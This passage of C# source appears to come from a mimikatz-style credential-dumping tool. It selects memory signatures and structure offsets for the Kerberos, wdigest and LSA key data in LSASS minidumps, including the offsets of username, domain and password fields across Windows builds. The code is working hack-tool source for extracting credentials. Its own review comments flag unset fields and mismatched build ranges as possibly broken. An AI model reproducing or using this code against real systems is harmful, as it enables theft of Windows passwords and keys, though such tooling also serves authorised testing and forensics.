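                Type credentialType = typeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL);

                if ((int)SystemInfo.WindowsMinBuild.WIN_XP <= build && build < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
                {
                    // XP and 2003 (previously two identical branches)
                    template.signature          = new byte[] { 0x48, 0x3b, 0xfe, 0x0f, 0x84 };
                    template.first_entry_offset = -4;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= build && build < (int)SystemInfo.WindowsBuild.WIN_10_1607)
                {
                    // Vista, 7, 8/8.1, 10 1507 and 10 1511 (previously five identical branches)
                    template.signature          = new byte[] { 0x48, 0x8b, 0x18, 0x48, 0x8d, 0x0d };
                    template.first_entry_offset = 6;
                }
                else if (build >= (int)SystemInfo.WindowsBuild.WIN_10_1607)
                {
                    template.signature          = new byte[] { 0x48, 0x8b, 0x18, 0x48, 0x8d, 0x0d };
                    template.first_entry_offset = 6;
                    sessionType                 = typeof(KIWI_KERBEROS_LOGON_SESSION_10_1607);
                    credentialType              = typeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607);
                }
                else
                {
                    // Previously String.Format with printf-style "%s" placeholders, which String.Format never
                    // substitutes, so the message carried no architecture or build number.
                    throw new Exception($"Could not identify template! Architecture: {sysinfo.ProcessorArchitecture} sysinfo.BuildNumber: {sysinfo.BuildNumber}");
                }

                template.LogonSessionType      = sessionType;
                template.LogonSessionTypeSize  = Marshal.SizeOf(sessionType);
                template.PrimaryCredentialType = credentialType;

                template.SessionCredentialOffset = StructFieldOffset(template.LogonSessionType, "credentials");
                template.SessionUserNameOffset   = StructFieldOffset(template.PrimaryCredentialType, "UserName");
                template.SessionDomainOffset     = StructFieldOffset(template.PrimaryCredentialType, "Domain");
                template.SessionPasswordOffset   = StructFieldOffset(template.PrimaryCredentialType, "Password");
            }
            else if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
            {
                // NOTE(review): the x86 path only sets signature and first_entry_offset; LogonSessionType,
                // PrimaryCredentialType and the Session*Offset fields keep their defaults — confirm the
                // caller tolerates that, or whether x86 structure types were intended here as on x64.
                if ((int)SystemInfo.WindowsMinBuild.WIN_XP <= build && build < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
                {
                    // XP and 2003 (previously two identical branches)
                    template.signature          = new byte[] { 0x8B, 0x7D, 0x08, 0x8B, 0x17, 0x39, 0x50 };
                    template.first_entry_offset = -8;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= build && build < (int)SystemInfo.WindowsMinBuild.WIN_8)
                {
                    // Vista and 7 (previously two identical branches)
                    template.signature          = new byte[] { 0x53, 0x8b, 0x18, 0x50, 0x56 };
                    template.first_entry_offset = -11;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_8 <= build && build < (int)SystemInfo.WindowsBuild.WIN_BLUE)
                {
                    // NOTE(review): this upper bound uses WindowsBuild.WIN_BLUE while the next branch's lower
                    // bound uses WindowsMinBuild.WIN_BLUE (kept as in the original) — confirm the two values
                    // neither overlap nor leave a gap.
                    template.signature          = new byte[] { 0x57, 0x8b, 0x38, 0x50, 0x68 };
                    template.first_entry_offset = -14;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_BLUE <= build && build < (int)SystemInfo.WindowsBuild.WIN_10_1903)
                {
                    // 8.1 through 10 1809 (previously three identical branches).
                    //###DOUBLE CHECK THE STRUCTURES BELOW LINE!!!! (original note on the 1507 sub-range)
                    //### kerbHelper[N] -> KerberosReferences... {-15,7}}, here N= 7
                    template.signature          = new byte[] { 0x56, 0x8b, 0x30, 0x50, 0x57 };
                    template.first_entry_offset = -15;
                }
                else if (build >= (int)SystemInfo.WindowsBuild.WIN_10_1903)
                {
                    template.signature          = new byte[] { 0x56, 0x8b, 0x30, 0x50, 0x53 };
                    template.first_entry_offset = -15;
                }
                else
                {
                    // Mirrors the x64 branch: builds below WIN_XP used to fall through and return a
                    // template with a null signature.
                    throw new Exception($"Could not identify template! Architecture: {sysinfo.ProcessorArchitecture} sysinfo.BuildNumber: {sysinfo.BuildNumber}");
                }
            }
            else
            {
                throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
            }
            return(template);
        }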
        /// <summary>
        /// Selects the wdigest package template (search signature, first-entry offset, primary-credential
        /// offset and list-entry layout) for the architecture and build number in <paramref name="sysinfo"/>.
        /// The USERNAME/HOSTNAME/PASSWORD offsets are the same constants for every handled build.
        /// </summary>
        /// <param name="sysinfo">Minidump system info; only ProcessorArchitecture and BuildNumber are read.</param>
        /// <returns>The populated <see cref="WdigestTemplate"/>.</returns>
        /// <exception cref="Exception">
        /// The architecture is neither AMD64 nor INTEL, or (x64 only) the build number is below WIN_XP.
        /// </exception>
        public static WdigestTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
        {
            WdigestTemplate template = new WdigestTemplate();
            int build = sysinfo.BuildNumber;

            // Fixed for every handled build.
            template.USERNAME_OFFSET = 0x30;
            template.HOSTNAME_OFFSET = 0x40;
            template.PASSWORD_OFFSET = 0x50;

            // Every selection below fills the same four fields, with a fresh list-entry instance each time.
            Action<byte[], int, int> select = (signature, firstEntryOffset, primaryOffset) =>
            {
                template.signature          = signature;
                template.first_entry_offset = firstEntryOffset;
                template.primary_offset     = primaryOffset;
                template.list_entry         = new KIWI_WDIGEST_LIST_ENTRY();
            };

            bool isAmd64 = sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64;
            bool isIntel = sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL;

            if (!isAmd64 && !isIntel)
            {
                throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
            }

            if (isAmd64)
            {
                if ((int)SystemInfo.WindowsMinBuild.WIN_XP <= build && build < (int)SystemInfo.WindowsMinBuild.WIN_2K3)
                {
                    select(new byte[] { 0x48, 0x3b, 0xda, 0x74 }, -4, 36);
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_2K3 <= build && build < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
                {
                    select(new byte[] { 0x48, 0x3b, 0xda, 0x74 }, -4, 48);
                }
                else if (build >= (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
                {
                    select(new byte[] { 0x48, 0x3b, 0xd9, 0x74 }, -4, 48);
                }
                else
                {
                    throw new Exception($"Unknown BuildNumber! {sysinfo.BuildNumber}");
                }

                return(template);
            }

            // x86
            if ((int)SystemInfo.WindowsMinBuild.WIN_XP <= build && build < (int)SystemInfo.WindowsMinBuild.WIN_2K3)
            {
                select(new byte[] { 0x74, 0x18, 0x8b, 0x4d, 0x08, 0x8b, 0x11 }, -6, 36);
            }
            else if ((int)SystemInfo.WindowsMinBuild.WIN_2K3 <= build && build < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
            {
                select(new byte[] { 0x74, 0x18, 0x8b, 0x4d, 0x08, 0x8b, 0x11 }, -6, 28);
            }
            else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= build && build < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
            {
                select(new byte[] { 0x74, 0x11, 0x8b, 0x0b, 0x39, 0x4e, 0x10 }, -6, 32);
            }
            else if ((int)SystemInfo.WindowsMinBuild.WIN_BLUE <= build && build < (int)SystemInfo.WindowsMinBuild.WIN_10)
            {
                select(new byte[] { 0x74, 0x15, 0x8b, 0x0a, 0x39, 0x4e, 0x10 }, -4, 32);
            }
            else if (build >= (int)SystemInfo.WindowsMinBuild.WIN_10)
            {
                select(new byte[] { 0x74, 0x15, 0x8b, 0x0a, 0x39, 0x4e, 0x10 }, -6, 32);
            }
            else
            {
                // NOTE(review): this branch is only reached for builds below WIN_XP, because the
                // `>= WIN_10` branch above has no upper bound. Its signature differs from every other
                // x86 entry, which suggests it was meant for a later Windows 10 build — confirm against
                // the upstream template table before relying on it.
                select(new byte[] { 0x74, 0x15, 0x8b, 0x17, 0x39, 0x56, 0x10 }, -6, 32);
            }

            return(template);
        }
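        /// <summary>
        /// Selects the LSA key-material template (key search pattern, key-handle structure and key
        /// structure) for the architecture and build number in <paramref name="sysinfo"/>. nt_major
        /// defaults to "6" and is set to "5" only for x86 builds at or below WIN_2K3. Each source
        /// template is now instantiated once per branch instead of once per copied field.
        /// </summary>
        /// <param name="sysinfo">Minidump system info; only ProcessorArchitecture and BuildNumber are read.</param>
        /// <returns>The populated <see cref="LsaTemplate_NT6"/>.</returns>
        /// <exception cref="Exception">
        /// The architecture is neither INTEL nor AMD64; the build is one the code does not implement
        /// (x86 at or below WIN_XP, x64 at or below WIN_2K3); or an x86 build falls in no handled range.
        /// </exception>
        public static LsaTemplate_NT6 get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
        {
            var template = new LsaTemplate_NT6();
            int build = sysinfo.BuildNumber;

            template.nt_major = "6";
            if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
            {
                if (build <= (int)SystemInfo.WindowsMinBuild.WIN_XP)
                {
                    throw new Exception("Maybe implemented later");
                }
                else if (build <= (int)SystemInfo.WindowsMinBuild.WIN_2K3)
                {
                    // upstream table: nt5 / x86 / 1
                    template.nt_major = "5";
                    var src = new LSA_x86_1();
                    template.key_pattern       = src.key_pattern;
                    template.key_handle_struct = src.key_handle_struct;
                    template.key_struct        = src.key_struct;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= build && build < (int)SystemInfo.WindowsMinBuild.WIN_7)
                {
                    // upstream table: nt6 / x86 / 1
                    var src = new LSA_x86_1();
                    template.key_pattern       = src.key_pattern;
                    template.key_handle_struct = src.key_handle_struct;
                    template.key_struct        = src.key_struct;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_7 <= build && build < (int)SystemInfo.WindowsMinBuild.WIN_8)
                {
                    // upstream table: nt6 / x86 / 2
                    var src = new LSA_x86_2();
                    template.key_pattern       = src.key_pattern;
                    template.key_handle_struct = src.key_handle_struct;
                    template.key_struct        = src.key_struct;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_8 <= build && build < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
                {
                    // upstream table: nt6 / x86 / 3
                    var src = new LSA_x86_3();
                    template.key_pattern       = src.key_pattern;
                    template.key_handle_struct = src.key_handle_struct;
                    template.key_struct        = src.key_struct;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_BLUE <= build && build < (int)SystemInfo.WindowsMinBuild.WIN_10)
                {
                    // upstream table: nt6 / x86 / 4
                    var src = new LSA_x86_4();
                    template.key_pattern       = src.key_pattern;
                    template.key_handle_struct = src.key_handle_struct;
                    template.key_struct        = src.key_struct;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_10 <= build && build <= (int)SystemInfo.WindowsBuild.WIN_10_1507)
                {
                    // upstream table: nt6 / x86 / 5 (note the inclusive upper bound, kept from the original)
                    var src = new LSA_x86_5();
                    template.key_pattern       = src.key_pattern;
                    template.key_handle_struct = src.key_handle_struct;
                    template.key_struct        = src.key_struct;
                }
                else if (build > (int)SystemInfo.WindowsBuild.WIN_10_1507)
                {
                    // upstream table: nt6 / x86 / 6
                    var src = new LSA_x86_6();
                    template.key_pattern       = src.key_pattern;
                    template.key_handle_struct = src.key_handle_struct;
                    template.key_struct        = src.key_struct;
                }
                else
                {
                    // Builds between WIN_2K3 and WIN_VISTA (and any other value outside the ranges above)
                    // previously fell through and returned a template with no key pattern; fail here instead.
                    throw new Exception($"Could not identify template! Architecture: {sysinfo.ProcessorArchitecture} sysinfo.BuildNumber: {sysinfo.BuildNumber}");
                }
            }
            else if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
            {
                if (build <= (int)SystemInfo.WindowsMinBuild.WIN_XP)
                {
                    throw new Exception("Maybe implemented later");
                }
                else if (build <= (int)SystemInfo.WindowsMinBuild.WIN_2K3)
                {
                    throw new Exception("Maybe implemented later");
                }
                else if (build < (int)SystemInfo.WindowsMinBuild.WIN_7)
                {
                    // Vista — upstream table: nt6 / x64 / 1
                    var src = new LSA_x64_1();
                    template.key_pattern       = src.key_pattern;
                    template.key_handle_struct = src.key_handle_struct;
                    template.key_struct        = src.key_struct;
                }
                else if (build < (int)SystemInfo.WindowsMinBuild.WIN_8)
                {
                    // Windows 7 — upstream table: nt6 / x64 / 2
                    var src = new LSA_x64_2();
                    template.key_pattern       = src.key_pattern;
                    template.key_handle_struct = src.key_handle_struct;
                    template.key_struct        = src.key_struct;
                }
                else if (build < (int)SystemInfo.WindowsMinBuild.WIN_10)
                {
                    // Windows 8 and 8.1 share this bucket but use different tables.
                    if (build < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
                    {
                        // Windows 8 — upstream table: nt6 / x64 / 3
                        var src = new LSA_x64_3();
                        template.key_pattern       = src.key_pattern;
                        template.key_handle_struct = src.key_handle_struct;
                        template.key_struct        = src.key_struct;
                    }
                    else
                    {
                        // Windows 8.1 (Blue) — upstream table: nt6 / x64 / 4
                        var src = new LSA_x64_4();
                        template.key_pattern       = src.key_pattern;
                        template.key_handle_struct = src.key_handle_struct;
                        template.key_struct        = src.key_struct;
                    }
                }
                else if (build < (int)SystemInfo.WindowsBuild.WIN_10_1809)
                {
                    // Windows 10 before 1809 — upstream table: nt6 / x64 / 5
                    var src = new LSA_x64_5();
                    template.key_pattern       = src.key_pattern;
                    template.key_handle_struct = src.key_handle_struct;
                    template.key_struct        = src.key_struct;
                }
                else
                {
                    // Windows 10 1809 and later — upstream table: nt6 / x64 / 6
                    var src = new LSA_x64_6();
                    template.key_pattern       = src.key_pattern;
                    template.key_handle_struct = src.key_handle_struct;
                    template.key_struct        = src.key_struct;
                }
            }
            else
            {
                throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
            }

            return(template);
        }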